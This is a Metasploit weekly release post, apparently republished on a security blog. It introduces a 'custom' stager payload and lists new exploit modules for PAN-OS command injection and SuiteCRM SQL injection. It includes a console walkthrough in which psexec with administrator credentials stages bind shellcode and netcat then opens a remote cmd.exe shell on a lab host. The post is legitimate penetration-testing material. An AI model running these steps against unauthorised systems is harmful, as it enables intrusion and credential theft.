Site icon API Security Blog

Metasploit Weekly Wrap-Up

## BYOS: Bring your own stager

![Metasploit Weekly Wrap-Up](https://blog.rapid7.com/content/images/2022/09/metasploit-ascii-1-2.png)

We try hard to make sure we have a great choice of fully-functional payloads to choose from, but sometimes you might want to “branch” out on your own, and if that’s the case we’ve got you covered. In an attempt to make Metasploit play well with others, we’ve introduced a brand new payload type: “custom.” “Custom” payloads use Metasploit stagers to build a stager that will stage whatever shellcode you send it.

Got a third-party payload you want to run like Sliver or a payload that’s too big or has too many bad characters to use in an exploit? All you need to do is queue up your exploit of choice in Framework, select the custom payload type, set the `shellcode_file` option, and when you launch the exploit, Metasploit will use our stagers to upload and run your custom shellcode on the target.

While we have developed a handler that will send your custom code in, there’s no requirement to use it. You are welcome to write your own handlers: the communication protocol is simply to prepend the shellcode size to the shellcode and send it; the custom payload stager will allocate memory and jump into the shellcode it places in memory.

Here’s an example using traditional “bind shellcode” to get a cmd.exe session on a Windows target:

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS 10.5.132.159 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
ng-Metasploit
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass v3Mpassword no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,…) or a normal read
/write folder share
SMBUser Administrator no The username to authenticate as

Payload options (windows/x64/custom/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC thread yes Exit technique (Accepted: ”, seh, thread, process, none)
LHOST 10.5.135.101 yes The listen address (an interface may be specified)
LPORT 4567 yes The listen port
SHELLCODE_FILE x64_shell_bind_4444.bin no Shellcode bin to launch

Exploit target:

Id Name
— —-
0 Automatic

msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.5.135.101:4567
[*] 10.5.132.159:445 – Connecting to the server…

[*] Sending stage (505 bytes) to 10.5.132.159
[+] Custom stage sent; session has been closed
[*] Custom session 1 opened (10.5.135.101:4567 -> 127.0.0.1) at 2022-09-08 15:29:02 -0500

[*] 10.5.132.159 – Custom session 1 closed. Reason: User exit
[+] Custom stage sent; session has been closed
msf6 exploit(windows/smb/psexec) > exit

Now, we can just open a netcat session to the independent bind shell we started on the target:

[ruby-3.0.2@metasploit-framework](upstream-master) tmoose@ubuntu:~/rapid7/metasploit-framework$ nc 10.5.132.159 4444
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:Windowssystem32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::1054:53:8f37:5615%11
IPv4 Address. . . . . . . . . . . : 10.5.132.159
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.5.132.1

Tunnel adapter isatap.{A69D5981-18E2-43CF-982C-D844D6BB7D03}:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :

C:Windowssystem32>

## Module added to exploit OS Command Injection in PAN-OS

[Mikhail Klyuchnikov](), [Nikita Abramov](), UnD3sc0n0c1d0, and [jheysel-r7]() introduced a new module that exploits an OS Command Injection vulnerability [CVE-2020-2038]() in PAN-OS. This exploit affects versions of PAN-OS 9.0 up to 9.0.10, 9.1 up to 9.1.4, and 10.0 up to 10.0.1. PAN-OS runs one of the leading enterprise firewalls, Palo Alto Networks next-generation firewall (NGFW). The [National Vulnerability Database]() ranks the severity of this exploit as a high 7.2, as administrators of the system are able to execute arbitrary commands with root privileges. This is due to the API not employing sufficient filtering of input for its “op” request. An excellent writeup on exploiting this vulnerability and other similar vulnerabilities can be found on [PT Swarm]().

## New module content (4)

* [SuiteCRM authenticated SQL injection in export functionality]() by [Exodus Intelligence](), [Redouane NIBOUCHA](), and [jheysel-r7]() – This adds support for EIP-0f5d2d7f, a vulnerability in the `uid` parameter of the `index.php?entryPoint=export` page on SuiteCRM prior to 7.x prior to 7.12.6 that allows for authenticated SQL injection. The module exploits this SQL injection vulnerability to extract the usernames and password hashes for SuiteCRM users, which can then be cracked offline later to gain access to SuiteCRM.

* [Palo Alto Networks Authenticated Remote Code Execution]() by [Mikhail Klyuchnikov](), [Nikita Abramov](), UnD3sc0n0c1d0, and [jheysel-r7](), which exploits [CVE-2020-2038]() – This adds an exploit module that leverages an OS Command Injection vulnerability in the PAN-OS management interface versions 10.0 to 10.0.1, versions 9.1.0 to 9.1.4, and version 9.0.0 to 9.0.10. This vulnerability is identified as CVE-2020-2038 and allows authenticated administrators to execute arbitrary OS commands with root privileges.

* [#16521]() from [bwatters-r7]() – This adds a 32-bit and 64-bit custom stage Windows payload. The custom stage allows users to provide their own custom executable code to be delivered as the payload stage in place of Meterpreter, Shell and other Metasploit-provided stages.

* [#16906]() from [bcoles]() – This improves the `post/windows/gather/enum_snmp` module with shell and Powershell sessions support as well as fixes issues that low-privileged sessions would run into while reading the registry.

## Enhancements and features (5)

* [#16911]() from [bcoles]() – This adds support for non-Meterpreter sessions and for WOW64 Meterpreter sessions to the `post/windows/gather/enum_ms_product_keys` module.
* [#16929]() from [bcoles]() – The `post/windows/gather/enum_services` module has been updated to support non-Meterpreter sessions, to fix some bugs, and to clean up the code. Additionally documentation has been added on how to use the module.
* [#16930]() from [bcoles]() – This updates the `scripts/resource/dev_checks.rc` resource script to fix issues and add additional module checks.
* [#16953]() from [bcoles]() – The `enum_domain` script has been updated to support Powershell and Shell sessions and its documentation and code have been cleaned up.
* [#17008]() from [EmilioPanti]() – ` rpc_core.rb` has been updated so that it now reports the number of evasion modules within Metasploit. Previously this statistic wasn’t being reported, whilst other statistics like number of exploit modules, auxiliary modules, and payloads were.

## Bugs fixed (5)

* [#16928]() from [bcoles]() – Multiple bugs have been fixed in the `Msf::Post::Windows::Service` mixin. Additionally, several methods have been adjusted within this mixin so that the data types they use or return are consistent.
* [#16998]() from [adfoster-r7]() – Fixes a crash in modules using the IAX2 client.
* [#17013]() from [zeroSteiner]() – This PR enhances `exploit/multi/http/jenkins_script_console` to handle changes to the login process for Jenkins newer than version 2.246.
* [#17014]() from [adfoster-r7]() – This fixes the `exploit/multi/php/ignition_laravel_debug_rce` module to use the default HTTP timeout for the check method. Without this, the check method would yield false negatives on slower connections.
* [#17018]() from [adfoster-r7]() – This fixes the `route add` command to use a sensible default netmask.

## Get it

As always, you can update to the latest Metasploit Framework with `msfupdate`
and you can get more details on the changes since the last blog post from
GitHub:

* [Pull Requests 6.2.17…6.2.18]()
* [Full diff 6.2.17…6.2.18]()

If you are a `git` user, you can clone the [Metasploit Framework repo]() (master branch) for the latest.
To install fresh without using git, you can use the open-source-only [Nightly Installers]() or the
[binary installers]() (which also include the commercial edition).Read More

Exit mobile version